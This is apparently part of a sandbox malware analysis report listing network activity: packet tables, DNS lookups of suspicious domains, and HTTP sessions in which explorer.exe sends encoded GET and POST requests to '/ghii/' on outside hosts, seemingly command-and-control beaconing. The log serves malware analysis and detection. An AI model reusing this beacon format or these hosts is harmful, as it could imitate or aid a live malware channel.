                                                    Feb 20, 2023 11:24:52.751712084 CET4970480192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:52.751737118 CET804970466.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:52.751769066 CET4970480192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:52.751791000 CET804970466.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:52.751837969 CET804970466.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:52.751854897 CET4970480192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:52.751878977 CET804970466.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:52.751914024 CET804970466.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:52.751946926 CET4970480192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:52.751948118 CET804970466.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:52.752037048 CET4970480192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:53.926626921 CET4970480192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:55.032953024 CET4970580192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:55.049160004 CET804970566.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:55.049297094 CET4970580192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:55.054128885 CET4970580192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:55.070070982 CET804970566.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:55.528533936 CET804970566.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:55.528573990 CET804970566.235.200.146192.168.2.4
                                                    Feb 20, 2023 11:24:55.528703928 CET4970580192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:55.542359114 CET4970580192.168.2.466.235.200.146
                                                    Feb 20, 2023 11:24:55.558676004 CET804970566.235.200.146192.168.2.4

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Feb 20, 2023 11:23:29.507638931 CET5657253192.168.2.48.8.8.8
                                                    Feb 20, 2023 11:23:29.868473053 CET53565728.8.8.8192.168.2.4
                                                    Feb 20, 2023 11:23:36.459855080 CET5091153192.168.2.48.8.8.8
                                                    Feb 20, 2023 11:23:36.478375912 CET53509118.8.8.8192.168.2.4
                                                    Feb 20, 2023 11:23:58.519124031 CET5968353192.168.2.48.8.8.8
                                                    Feb 20, 2023 11:23:58.615147114 CET53596838.8.8.8192.168.2.4
                                                    Feb 20, 2023 11:24:21.643115997 CET6416753192.168.2.48.8.8.8
                                                    Feb 20, 2023 11:24:21.660044909 CET53641678.8.8.8192.168.2.4
                                                    Feb 20, 2023 11:24:27.683267117 CET5856553192.168.2.48.8.8.8
                                                    Feb 20, 2023 11:24:27.703109026 CET53585658.8.8.8192.168.2.4
                                                    Feb 20, 2023 11:24:35.866682053 CET5223953192.168.2.48.8.8.8
                                                    Feb 20, 2023 11:24:35.973726034 CET53522398.8.8.8192.168.2.4
                                                    Feb 20, 2023 11:24:43.878320932 CET5680753192.168.2.48.8.8.8
                                                    Feb 20, 2023 11:24:43.900916100 CET53568078.8.8.8192.168.2.4
                                                    Feb 20, 2023 11:24:52.037426949 CET6100753192.168.2.48.8.8.8
                                                    Feb 20, 2023 11:24:52.197849989 CET53610078.8.8.8192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Feb 20, 2023 11:23:29.507638931 CET192.168.2.48.8.8.80xa0b5Standard query (0)www.wenzid4.topA (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:23:36.459855080 CET192.168.2.48.8.8.80xfb58Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:23:58.519124031 CET192.168.2.48.8.8.80xaf6Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:21.643115997 CET192.168.2.48.8.8.80x9db9Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:27.683267117 CET192.168.2.48.8.8.80xf41eStandard query (0)www.energybig.xyzA (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:35.866682053 CET192.168.2.48.8.8.80xe3edStandard query (0)www.genuineinsights.cloudA (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:43.878320932 CET192.168.2.48.8.8.80xb17dStandard query (0)www.octohoki.netA (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:52.037426949 CET192.168.2.48.8.8.80xbc4Standard query (0)www.ladybillplanet.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Feb 20, 2023 11:23:29.868473053 CET8.8.8.8192.168.2.40xa0b5No error (0)www.wenzid4.top107.148.8.96A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:23:36.478375912 CET8.8.8.8192.168.2.40xfb58No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                    Feb 20, 2023 11:23:36.478375912 CET8.8.8.8192.168.2.40xfb58No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:23:58.615147114 CET8.8.8.8192.168.2.40xaf6No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                    Feb 20, 2023 11:23:58.615147114 CET8.8.8.8192.168.2.40xaf6No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:21.660044909 CET8.8.8.8192.168.2.40x9db9No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                    Feb 20, 2023 11:24:21.660044909 CET8.8.8.8192.168.2.40x9db9No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:27.703109026 CET8.8.8.8192.168.2.40xf41eNo error (0)www.energybig.xyz184.94.215.91A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:35.973726034 CET8.8.8.8192.168.2.40xe3edNo error (0)www.genuineinsights.cloud66.96.162.149A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:43.900916100 CET8.8.8.8192.168.2.40xb17dNo error (0)www.octohoki.netparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                    Feb 20, 2023 11:24:43.900916100 CET8.8.8.8192.168.2.40xb17dNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:43.900916100 CET8.8.8.8192.168.2.40xb17dNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:43.900916100 CET8.8.8.8192.168.2.40xb17dNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:43.900916100 CET8.8.8.8192.168.2.40xb17dNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:43.900916100 CET8.8.8.8192.168.2.40xb17dNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:43.900916100 CET8.8.8.8192.168.2.40xb17dNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:43.900916100 CET8.8.8.8192.168.2.40xb17dNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)false
                                                    Feb 20, 2023 11:24:52.197849989 CET8.8.8.8192.168.2.40xbc4No error (0)www.ladybillplanet.comladybillplanet.comCNAME (Canonical name)IN (0x0001)false
                                                    Feb 20, 2023 11:24:52.197849989 CET8.8.8.8192.168.2.40xbc4No error (0)ladybillplanet.com66.235.200.146A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.wenzid4.top
                                                    • www.energybig.xyz
                                                    • www.genuineinsights.cloud
                                                    • www.octohoki.net
                                                    • www.ladybillplanet.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.449695107.148.8.9680C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 20, 2023 11:23:31.242640018 CET136OUTGET /ghii/?1LM=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AgWuiPHLLIEAEQ==&kTj=94JTJ5e-oG HTTP/1.1
                                                    Host: www.wenzid4.top
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Feb 20, 2023 11:23:31.448966026 CET136INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 20 Feb 2023 10:21:41 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.449698184.94.215.9180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 20, 2023 11:24:27.880846977 CET140OUTPOST /ghii/ HTTP/1.1
                                                    Host: www.energybig.xyz
                                                    Connection: close
                                                    Content-Length: 185
                                                    Cache-Control: no-cache
                                                    Origin: http://www.energybig.xyz
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.energybig.xyz/ghii/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 31 4c 4d 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 78 68 34 74 48 62 65 63 57 2d 5a 4f 44 76 36 55 55 41 29 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: 1LM=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4xh4tHbecW-ZODv6UUA).
                                                    Feb 20, 2023 11:24:28.196916103 CET141INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Feb 2023 10:24:27 GMT
                                                    Server: Apache
                                                    Content-Length: 5278
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                    Feb 20, 2023 11:24:28.196948051 CET142INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                    Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                    Feb 20, 2023 11:24:28.196968079 CET144INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                    Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                    Feb 20, 2023 11:24:28.196989059 CET145INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                    Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                    Feb 20, 2023 11:24:28.197280884 CET145INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                    Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.449699184.94.215.9180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 20, 2023 11:24:30.590812922 CET146OUTGET /ghii/?1LM=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7tqaEj2Tcyyr5eEg==&kTj=94JTJ5e-oG HTTP/1.1
                                                    Host: www.energybig.xyz
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Feb 20, 2023 11:24:30.862343073 CET147INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Feb 2023 10:24:30 GMT
                                                    Server: Apache
                                                    Content-Length: 5278
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                    Feb 20, 2023 11:24:30.862416029 CET149INData Raw: 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33
